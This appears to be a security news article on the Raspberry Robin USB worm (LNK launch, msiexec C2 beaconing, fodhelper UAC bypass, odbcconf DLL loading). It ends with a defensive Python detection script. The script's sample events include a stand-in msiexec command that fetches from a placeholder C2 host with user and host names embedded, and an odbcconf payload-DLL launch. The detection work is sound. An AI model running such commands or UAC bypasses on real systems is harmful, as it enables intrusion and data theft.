Windows Installer Used by New Raspberry Robin Worm
The Worm Creates a New Process that Uses cmd.exe to Run Malicious Files.
Windows Installer is the Windows component for installing, maintaining, and removing software. Installation packages, loosely relational databases built as COM Structured Storage files and commonly called “MSI files” after their default filename extension, contain the installation information and, where applicable, the files to be installed.
Compared with its predecessor, the Setup API, Windows Installer offers considerable improvements, among them a graphical user interface framework and automatic generation of the uninstallation sequence. It is positioned as an alternative to standalone executable installer frameworks such as older versions of InstallShield and NSIS.
A new piece of Windows malware with worm capabilities has been found by Red Canary intelligence researchers. It spreads via removable USB drives.
The malware is tied to a cluster of malicious activity nicknamed Raspberry Robin, which, according to the available information, was first observed in September 2021.
It was found in several customer networks, some of them in the technology and industrial sectors. The discovery is credited to Red Canary’s Detection Engineering team.
When an infected USB device carrying a malicious .LNK file is attached to a new Windows PC, Raspberry Robin spreads to that system.
As BleepingComputer reports, once connected, the worm creates a new process that uses cmd.exe to run a malicious file that has been saved on the infected computer’s hard disk.
The Microsoft Standard Installer (msiexec.exe) is used to communicate with its command-and-control (C2) servers, which are most likely hosted on compromised QNAP devices; TOR exit nodes serve as additional C2 infrastructure.
“Raspberry Robin” is Red Canary’s name for a cluster of activity we first observed in September 2021 involving a worm that is often installed via USB drive. This activity cluster relies on msiexec.exe to call out to its infrastructure, often compromised QNAP devices, using HTTP requests that contain a victim’s user and device names. We also observed Raspberry Robin use TOR exit nodes as additional command and control (C2) infrastructure.
Like most activity clusters we track, Raspberry Robin began as a handful of detections with similar characteristics that we saw in multiple customers’ environments, first noticed by Jason Killam from Red Canary’s Detection Engineering team. We saw Raspberry Robin activity as far back as September 2021, though most related activity occurred during or after January 2022. As we observed additional activity, we couldn’t find public reporting to corroborate our analysis, aside from some findings on VirusTotal that we suspected were related based on overlap in C2 domains.
This DLL is launched by Raspberry Robin with the help of two further legitimate Windows utilities: fodhelper (a trusted program for managing optional features in Windows Settings) and odbcconf (a legitimate tool for configuring ODBC drivers).
The first is used to get past User Account Control (UAC); the second helps execute and configure the DLL.
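The behaviours described above (cmd.exe spawned from a shortcut on a removable drive, msiexec.exe reaching out over HTTP with the victim’s user and device names in the request, fodhelper spawning a child process, and odbcconf loading a DLL) translate directly into process-creation detection rules. The script below is an added example written for this article; it is not Red Canary’s detection logic or any sample of the worm. The event field names, the drive-letter heuristic for the USB stage, the `.dll`-in-command-line check for odbcconf, and all sample events (including the placeholder domain `c2.example.invalid`) are constructed assumptions for the demonstration.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (field names are an assumption, modelled on Sysmon Event ID 1)."""
    image: str          # full path of the created process
    command_line: str   # command line of the created process
    parent_image: str   # full path of the parent process
    user: str           # account the process runs as
    host: str           # hostname of the machine that logged the event


URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def base_name(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event triggers (empty list = nothing suspicious)."""
    hits: list[str] = []
    image = base_name(ev.image)
    parent = base_name(ev.parent_image)
    cmd = ev.command_line.lower()

    # Rule 1: cmd.exe started from Explorer (a double-clicked shortcut) whose command
    # line points at a drive letter other than the system drive. Heuristic for the
    # USB-borne .LNK stage; assumes Windows is installed on C:.
    if image == "cmd.exe" and parent == "explorer.exe" and re.search(r"\b[d-z]:\\", cmd):
        hits.append("cmd_from_explorer_nonsystem_drive")

    # Rule 2: msiexec.exe handed a URL instead of a local .msi. A second finding is
    # raised when the URL carries the victim's user or host name, the beaconing
    # pattern the article describes.
    if image == "msiexec.exe":
        urls = URL_RE.findall(ev.command_line)
        if urls:
            hits.append("msiexec_remote_url")
            if any(ev.user.lower() in u.lower() or ev.host.lower() in u.lower() for u in urls):
                hits.append("msiexec_url_leaks_identity")

    # Rule 3: fodhelper.exe auto-elevates and normally spawns nothing, so any child
    # process is worth a look as a possible UAC bypass.
    if parent == "fodhelper.exe":
        hits.append("fodhelper_spawned_child")

    # Rule 4: odbcconf.exe referencing a DLL on its command line. Legitimate driver
    # registration can also do this, so treat it as a lead, not a verdict.
    if image == "odbcconf.exe" and ".dll" in cmd:
        hits.append("odbcconf_loads_dll")

    return hits


def scan(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    """Run every rule over a batch of events and keep only the events that triggered something."""
    return [(base_name(ev.image), hits) for ev in events if (hits := detect(ev))]


# Constructed sample events; none of these are real telemetry or indicators.
SAMPLE_EVENTS = [
    # Shortcut on a USB stick (drive E:) launching cmd.exe
    ProcEvent(r"C:\Windows\System32\cmd.exe", r'cmd.exe /R "E:\readme"',
              r"C:\Windows\explorer.exe", "alice", "WS01"),
    # msiexec.exe fetching from a remote host, with user and host names in the URL
    ProcEvent(r"C:\Windows\System32\msiexec.exe", "msiexec /q /i http://c2.example.invalid/alice/WS01",
              r"C:\Windows\System32\cmd.exe", "alice", "WS01"),
    # odbcconf.exe started by fodhelper.exe and pointed at a DLL in a temp folder
    ProcEvent(r"C:\Windows\System32\odbcconf.exe", r"odbcconf.exe C:\Users\alice\AppData\Local\Temp\payload.dll",
              r"C:\Windows\System32\fodhelper.exe", "alice", "WS01"),
    # Benign: a user installing a local .msi from Explorer
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"msiexec /i C:\Users\alice\Downloads\tool.msi",
              r"C:\Windows\explorer.exe", "alice", "WS01"),
    # Benign: a batch file on the system drive run from Explorer
    ProcEvent(r"C:\Windows\System32\cmd.exe", r'cmd.exe /c "C:\Tools\build.cmd"',
              r"C:\Windows\explorer.exe", "alice", "WS01"),
]

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(hits)}")
```

Running the script flags the first three constructed events and stays silent on the two benign ones. In a real deployment the rules would be fed from the endpoint’s process-creation telemetry, and rule 2 is the one worth tuning first: msiexec.exe fetching a package from a URL is unusual on most workstations, and a URL that embeds the local user or host name is the strongest of the four signals here.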